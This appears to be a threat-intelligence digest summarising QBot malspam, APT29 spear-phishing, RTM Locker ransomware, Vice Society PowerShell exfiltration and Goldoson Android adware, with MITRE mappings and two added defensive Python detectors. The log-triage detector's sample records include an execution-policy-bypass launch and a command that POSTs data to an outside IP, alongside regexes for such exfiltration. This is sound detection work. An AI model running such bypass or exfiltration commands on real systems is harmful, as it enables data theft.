The various threat intelligence stories in this iteration of Anomali Cyber Watch cover the following topics: APT, Clicker, Conversation hijacking, Data exfiltration, Malspam, Phishing, Ransomware, Russia, and supply chain. IOCs related to these stories are attached to the Anomali Cyber Watch and can be used to check logs for potentially malicious activity.
Figure 1 – IOC summary chart. This chart summarizes the IOCs attached to this magazine and provides a glimpse into the threats discussed.
The latest cyber news and threat intelligence
QBot Banker delivered via business correspondence
(Post Date: Apr 17, 2023)
In early April 2023, we detected an increase in malicious spam that leverages business email thread hijacking to deliver the QBot (also known as QakBot, QuackBot, or Pinkslipbot) banking trojan. Observed lures in English, German, Italian, and French target different countries, with the top three being Germany, Argentina, and Italy, in that order. The attacker spoofs sender names in the hijacked conversation to convince the target to open the attached PDF file. The PDF then presents the target with buttons, a password, and instructions to download, unpack, and run a malicious Windows Script File (WSF) from a password-protected archive. User execution is followed by automatic deobfuscation of the embedded JScript, which downloads the QBot DLL from a compromised website and generates an encoded PowerShell script that is executed with the help of rundll32. QBot steals credentials, profiles systems to identify potential candidates for further high-value targeting, and steals locally stored emails to fuel further thread-hijacking malspam.
Analyst Comments: Because this campaign sends from a fraudulent email address that differs from the impersonated sender’s real address, the spoofing can be identified by comparing the display name that precedes the address in the ‘From’ field with the address itself. Users should be wary of questionable file types such as password-protected archives and WSF files. Network and host-based indicators related to this QBot campaign are available on the Anomali platform, and customers are encouraged to block them in their infrastructure.
MITRE ATT&CK: [MITRE ATT&CK] T1566 – Phishing | [MITRE ATT&CK] T1204 – User Execution | [MITRE ATT&CK] T1207 – Rogue Domain Controller | [MITRE ATT&CK] T1140 – Deobfuscate/Decode Files or Information | [MITRE ATT&CK] T1059.001 – Command and Scripting Interpreter: PowerShell | [MITRE ATT&CK] T1218.011 – Signed Binary Proxy Execution: Rundll32 | [MITRE ATT&CK] T1090 – Proxy | [MITRE ATT&CK] T1114.001 – Email Collection: Local Email Collection | [MITRE ATT&CK] T1555 – Credentials from Password Stores | [MITRE ATT&CK] T1539 – Steal Web Session Cookie | [MITRE ATT&CK] T1105 – Ingress Tool Transfer
tag: Malware:QBot, Malware Type:Banking Trojan, Malware:QakBot, Malware:QuackBot, Malware:Pinkslipbot, Detection:Trojan-Banker.Win32.Qbot, Target Country:Germany, Target Country:DE, Target Country:Argentina, Target Country:AR, Target Country:Italy, Target Country:IT, Campaign:Obama249, Abuse:PowerShell, File Type:WSF, File Type:DLL, File Type:PDF, File Type:ZIP, JScript, Technique:Email Thread Hijacking, Technique:Conversation Hijacking, Technique:Compromised Website, Abuse:Base64, Abuse:rundll32, Target System:Windows
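The analyst comments above point at two things a mail gateway can check mechanically: whether the display name in the ‘From’ header agrees with the address that actually sent the message, and whether an attachment is a password-protected archive or a script file such as WSF. The following is an added example, not code from Anomali or from the report; the sample message, its addresses and the archive contents are all constructed for the example, and the set of flagged extensions is an assumption.

```python
"""Added example (not from the Anomali report): a mail-gateway style triage
check for two traits of the QBot campaign above: a 'From' header whose
display name does not agree with the actual sending address, and an archive
attachment (possibly password-protected) that carries a Windows Script File.
The sample message is constructed for this example."""
import email
import io
import zipfile
from email import policy
from email.message import EmailMessage
from email.utils import parseaddr

# Attachment types the analyst comments call questionable in business mail
# (the exact set is an assumption of this example).
SCRIPT_EXTENSIONS = {".wsf", ".js", ".jse", ".vbs"}
ARCHIVE_EXTENSIONS = {".zip"}


def _ext(filename: str) -> str:
    return "." + filename.rsplit(".", 1)[-1].lower() if "." in filename else ""


def from_header_mismatch(from_header: str) -> str:
    """Return a reason string when the display name preceding the address
    carries its own e-mail address at a different domain, else ''."""
    name, addr = parseaddr(from_header)
    if "@" not in addr or "@" not in name:
        return ""
    claimed = name.rsplit("@", 1)[1].strip("<> \"'").lower()
    real = addr.rsplit("@", 1)[1].lower()
    if claimed != real:
        return f"display name claims {claimed} but mail comes from {real}"
    return ""


def archive_findings(label: str, data: bytes) -> list:
    """Inspect a ZIP without extracting it: entry names stay readable even
    when the content is password-protected (general-purpose flag bit 0 set)."""
    findings = []
    try:
        with zipfile.ZipFile(io.BytesIO(data)) as zf:
            for info in zf.infolist():
                if info.flag_bits & 0x1:
                    findings.append(f"password-protected entry: {label}:{info.filename}")
                if _ext(info.filename) in SCRIPT_EXTENSIONS:
                    findings.append(f"script inside archive: {label}:{info.filename}")
    except zipfile.BadZipFile:
        findings.append(f"unreadable archive: {label}")
    return findings


def triage_message(raw: bytes) -> list:
    """Parse a raw RFC 5322 message and return a list of textual findings."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    findings = []
    reason = from_header_mismatch(str(msg["From"] or ""))
    if reason:
        findings.append("from-header mismatch: " + reason)
    for part in msg.iter_attachments():
        name = part.get_filename() or ""
        ext = _ext(name)
        if ext in SCRIPT_EXTENSIONS:
            findings.append(f"script attachment: {name}")
        elif ext in ARCHIVE_EXTENSIONS:
            findings.extend(archive_findings(name, part.get_payload(decode=True)))
    return findings


def build_sample() -> bytes:
    """Constructed lure in the campaign's shape: a reply-chain subject, a
    display name that impersonates a partner address, and a ZIP holding a WSF."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("Dokument_2023.wsf", "<job><script language='JScript'></script></job>")
    msg = EmailMessage()
    msg["From"] = '"jane.doe@partner.example" <notify@unrelated-host.example>'
    msg["To"] = "finance@company.example"
    msg["Subject"] = "RE: RE: Vertrag 2023"
    msg.set_content("Please see the attached document.")
    msg.add_attachment(buf.getvalue(), maintype="application", subtype="zip",
                       filename="Dokument.zip")
    return msg.as_bytes()


if __name__ == "__main__":
    for finding in triage_message(build_sample()):
        print(finding)
```

The archive check deliberately never extracts or opens the WSF: ZIP central-directory entries expose each file name and the encryption flag in clear, so a gateway can flag a password-protected archive that contains a script without knowing the password the lure hands to the user.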
Spy campaign linked to Russian intelligence
(Post Date: Apr 13, 2023)
A new cyberespionage campaign by the Russian state-backed group Cozy Bear (APT29, Nobelium) is targeting NATO and European Union member states and, to a lesser extent, Africa. An embassy-themed spear-phishing link leads to a compromised website hosting a custom EnvyScout script that uses HTML smuggling techniques. The campaign has used the SnowyAmber downloader since October 2022, HalfRig since February 2023, and QuarterRig since March 2023. The last observed payload was an attack-framework beacon (Cobalt Strike or Brute Ratel).
Analyst Comments: Many advanced attacks start with spear-phishing emails. It’s important to teach users basic online hygiene and phishing awareness. Indicators related to this Cozy Bear campaign are available on the Anomali platform, and customers are encouraged to block them in their infrastructure. Network defenders can use the YARA rules published by CERT Polska, the Polish government CERT, to identify the custom backdoors associated with this campaign.
MITRE ATT&CK: [MITRE ATT&CK] T1583.003 – Acquire Infrastructure: Virtual Private Server | [MITRE ATT&CK] T1583.006 – Acquire Infrastructure: Web Services | [MITRE ATT&CK] T1584 – Compromise Infrastructure | [MITRE ATT&CK] T1566 – Phishing | [MITRE ATT&CK] T1566.001 – Phishing: Spearphishing Attachment | [MITRE ATT&CK] T1566.002 – Phishing: Spearphishing Link | [MITRE ATT&CK] T1204 – User Execution | [MITRE ATT&CK] T1204.002 – User Execution: Malicious File | [MITRE ATT&CK] T1547.001 – Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder | [MITRE ATT&CK] T1574.001 – Hijack Execution Flow: DLL Search Order Hijacking | [MITRE ATT&CK] T1574.002 – Hijack Execution Flow: DLL Side-Loading | [MITRE ATT&CK] T1027.006 – Obfuscated Files or Information: HTML Smuggling | [MITRE ATT&CK] T1140 – Deobfuscate/Decode Files or Information | [MITRE ATT&CK] T1553.005 – Subvert Trust Controls: Mark-of-the-Web Bypass | [MITRE ATT&CK] T1102 – Web Service | [MITRE ATT&CK] T1102.003 – Web Service: One-Way Communication
signature: APT29 HalfRig Obfuscation. YARA by CERT Polska | APT29 QuarterRig. YARA by CERT Polska | APT29 SnowyAmber Downloader. YARA by CERT Polska
tag: Actor:Cozy Bear, Actor:Nobelium, MITRE Group:APT29, Target Region:NATO, Target Region:European Union, Target Region:Africa, Source Country:Russia, Source Country:RU, Technique:HTML Smuggling, Malware:EnvyScout, Malware:SnowyAmber, Malware:QuarterRig, Malware:HalfRig, Malware:Cobalt Strike, Malware:Brute Ratel, Abuse:Notion Collaboration Service, Target System:Windows
Read The Manual Locker: A Private RaaS Provider
(Post Date: Apr 13, 2023)
The Read The Manual (RTM) Locker group is a new ransomware-as-a-service (RaaS) provider with potential links to the Commonwealth of Independent States. The group operates ransomware that targets Windows and focuses on double-extortion attacks against corporate environments. The RTM Locker malware requires affiliates to already hold administrative privileges on the compromised network. To maximize encryption coverage, the locker attempts to mount every unmounted partition to unused drive letters until all 26 letters are in use. RTM Locker uses input/output completion ports (IOCP) so that multiple threads can work on the same file at the same time. The RTM Locker group forbids direct spread via malspam, marks builds to deter premature leaks, and clears logs and deletes the locker after a system is encrypted. The group also enforces strict rules to ensure that affiliates adhere to its targeting restrictions; affiliates are removed if they are inactive for more than 10 days.
Analyst Comments: Multi-threading enables fast encryption in RTM Locker. Ransomware is a constantly evolving threat, and the most fundamental defense is a proper backup and restore process that can recover affected data without having to decrypt it. Data theft can be contained through segmentation, encryption of data at rest, and limiting the storage of personal and sensitive data.
MITRE ATT&CK: [MITRE ATT&CK] T1057 – Process Discovery | [MITRE ATT&CK] T1070.001 – Indicator Removal on Host: Clear Windows Event Logs | [MITRE ATT&CK] T1070.004 – Indicator Removal on Host: File Deletion | [MITRE ATT&CK] T1106 – Native API | [MITRE ATT&CK] T1134.002 – Access Token Manipulation: Create Process with Token | [MITRE ATT&CK] T1486 – Data Encrypted for Impact | [MITRE ATT&CK] T1489 – Service Stop
tag: Actor:RTM Locker, Malware:RTM Locker, Malware Type:RaaS, Malware Type:Ransomware, Detection:RTMLocker, Abuse:TOX, Abuse:IOCP, Source Region:Commonwealth of Independent States, Source Region:CIS, Target System:Windows
Vice Society: A Tale of Victim Data Exfiltration via PowerShell, aka Stealing off the Land
(Post Date: Apr 13, 2023)
A new PowerShell data exfiltration script in use by the Vice Society ransomware group has been detected. An attacker with access to the target’s domain controller can distribute this script to any endpoint within the network. It is launched with parameters that bypass execution policy restrictions and begins by identifying the drives mounted on the system via Windows Management Instrumentation (WMI). The script automatically enumerates and processes every directory on each mounted volume whose name does not match its ignore list. It then applies additional keywords and parameters to select the directories and files to exfiltrate to the attacker’s web server via HTTP POST requests. The script implements rate limiting so that the host’s resources are not overused.
Analyst Comments: Activity that relies on Living Off the Land Binaries and Scripts (LOLBAS) methods such as PowerShell scripts and WMI is difficult to detect. Network defenders can review Windows Event Log (WEL) event IDs 400, 600, 800, 4103, and 4104. Monitor HTTP POST events from endpoints to unknown remote HTTP servers and HTTP activity to external IP addresses. The Palo Alto Networks YARA signature can be used to detect this malicious PowerShell exfiltration script.
MITRE ATT&CK: [MITRE ATT&CK] T1059.001 – Command and Scripting Interpreter: PowerShell | [MITRE ATT&CK] T1020 – Automated Exfiltration | [MITRE ATT&CK] T1083 – File and Directory Discovery | [MITRE ATT&CK] T1005 – Data from Local System
signature: Vice Society PS Exfil script. YARA by Palo Alto Networks
tag: Actor:Vice Society, Malware Type:Ransomware, Malware Type:Exfiltration Tool, Data Exfiltration, Abuse:PowerShell, Technique:Living Off the Land Binaries and Scripts, Technique:LOLBAS, Technique:Rate Limiting, Windows Event Log, Target System:Windows
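The analyst comments above name the PowerShell event IDs worth reviewing and the traits that distinguish this script from ordinary administration: an execution policy bypass at launch, WMI enumeration of logical disks, and HTTP POSTs to a web server outside the organization. The following added example, which is not code from Palo Alto Networks or from the Anomali report, scores constructed event-log records against those traits; the allowlist of internal HTTP hosts, the 203.0.113.10 address and every log line are constructed for the example.

```python
"""Added example (not from Palo Alto Networks or the Anomali report): a small
triage pass over PowerShell event-log records of the kinds the analyst comments
above recommend reviewing (Event IDs 400, 600, 800, 4103 and 4104). It looks
for the three traits the Vice Society script description gives: an execution
policy bypass at launch, WMI drive enumeration, and HTTP POSTs to a web server
outside the organization. Every log record below is constructed."""
import re
from typing import Optional, Tuple

# Hosts the (hypothetical) organization legitimately POSTs to from scripts.
KNOWN_HTTP_HOSTS = {"intranet.corp.example"}

# PowerShell accepts unambiguous prefixes of -ExecutionPolicy (e.g. -ep, -ex).
BYPASS_RE = re.compile(r"-(?:ExecutionPolicy|Exec\w*|ep|ex)\s+Bypass", re.I)
WMI_DISK_RE = re.compile(
    r"\b(?:Get-WmiObject|gwmi|Get-CimInstance)\b.*?\bWin32_LogicalDisk\b", re.I | re.S)
HTTP_POST_RE = re.compile(
    r"\bInvoke-(?:WebRequest|RestMethod)\b.*?-Method\s+Post\b", re.I | re.S)
URL_HOST_RE = re.compile(r"https?://([A-Za-z0-9.\-]+)", re.I)

# Constructed records, shaped like the fields Windows exposes for these events.
SAMPLE_EVENTS = [
    {"EventID": 400,
     "HostApplication": "powershell.exe -ep Bypass -File C:\\Users\\Public\\w.ps1"},
    {"EventID": 4104, "ScriptBlockText": "Get-Process | Select-Object Name, Id"},
    {"EventID": 4104, "ScriptBlockText": (
        "$drives = Get-WmiObject Win32_LogicalDisk | Where-Object { $_.DriveType -eq 3 }\n"
        "Invoke-WebRequest -Uri http://203.0.113.10/upload -Method Post -Body $chunk\n"
        "Start-Sleep -Milliseconds 200")},
    {"EventID": 4104, "ScriptBlockText":
        "Invoke-RestMethod -Uri https://intranet.corp.example/api -Method Post -Body $report"},
]


def external_post_hosts(script: str) -> set:
    """Hosts referenced by URL in the script that are not on the allowlist."""
    hosts = {m.group(1).lower() for m in URL_HOST_RE.finditer(script)}
    return hosts - KNOWN_HTTP_HOSTS


def score_event(event: dict) -> Optional[Tuple[str, list]]:
    """Return (severity, reasons) for a suspicious record, or None."""
    reasons = []
    if event["EventID"] in (400, 600, 800, 4103):
        # Engine/provider lifecycle and module logging carry the launch command line.
        text = event.get("HostApplication", "") + " " + event.get("Payload", "")
        if BYPASS_RE.search(text):
            reasons.append("execution policy bypass at launch")
        return ("low", reasons) if reasons else None
    if event["EventID"] == 4104:
        # Script block logging exposes the deobfuscated script text.
        script = event.get("ScriptBlockText", "")
        wmi = bool(WMI_DISK_RE.search(script))
        post = bool(HTTP_POST_RE.search(script))
        ext = external_post_hosts(script) if post else set()
        if wmi:
            reasons.append("WMI enumeration of logical disks")
        if post and ext:
            reasons.append("HTTP POST to non-allowlisted host(s): " + ", ".join(sorted(ext)))
        if wmi and post and ext:
            return ("high", reasons)
        if post and ext:
            return ("medium", reasons)
        if wmi:
            return ("low", reasons)
    return None


def triage(events: list) -> list:
    """Score every record and return the alerts in log order."""
    alerts = []
    for idx, ev in enumerate(events):
        result = score_event(ev)
        if result:
            alerts.append({"index": idx, "event_id": ev["EventID"],
                           "severity": result[0], "reasons": result[1]})
    return alerts


if __name__ == "__main__":
    for alert in triage(SAMPLE_EVENTS):
        print(alert)
```

Only the combination of disk enumeration and an outbound POST to an unknown host reaches the high tier; either trait alone is common in legitimate administration, which is why the comments above stress monitoring POST destinations rather than PowerShell use as such. In a real deployment the 4104 records would come from `Get-WinEvent` on the `Microsoft-Windows-PowerShell/Operational` log, and the allowlist would be fed from the organization’s own inventory.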
Goldoson: Privacy Invasion and Clicker Android Adware Found in Popular South Korean App
(Post Date: Apr 12, 2023)
A malicious Android library called Goldoson has been found that primarily targets South Korean users. McAfee researchers detected it in applications with over 100 million downloads on Google Play and over 8 million downloads on the ONE store, a popular app store in South Korea. Goldoson collects information about the user’s location, access history, and installed applications. The library either inherits the location permission already granted to the host app or explicitly prompts the user to grant it. Goldoson also generates hidden, deceptive traffic by loading HTML code into a customized, hidden WebView and recursively visiting URLs.
Analyst Comments: All applications identified as affected have been updated or removed from the official store. Users are advised to regularly review the list of installed applications and uninstall applications that are no longer needed. Watch for signs of malicious resource usage, such as device overheating and rapid battery drain. Do not grant unnecessary permissions, such as location permissions, unless you know that the application needs them for its intended functionality. Network indicators related to Goldoson adware are available on the Anomali platform, and customers are encouraged to block them in their infrastructure.
MITRE ATT&CK: [MITRE ATT&CK] T1474.001 – Supply Chain Compromise: Compromise Software Dependencies and Development Tools | [MITRE ATT&CK] T1406 – Obfuscated Files or Information | [MITRE ATT&CK] T1430 – Location Tracking | [MITRE ATT&CK] T1424 – Process Discovery | [MITRE ATT&CK] T1646 – Exfiltration Over C2 Channel | [MITRE ATT&CK] T1643 – Generate Traffic from Victim
tag: Malware:Goldoson, Malware Type:Clicker, Malware Type:Adware, Supply Chain, Target Country:South Korea, Target Country:KR, Malware Type:Compromised App, Malware Type:Malware Library, Target:Mobile, Abuse:Google Play, Abuse:ONE Store, Target System:Android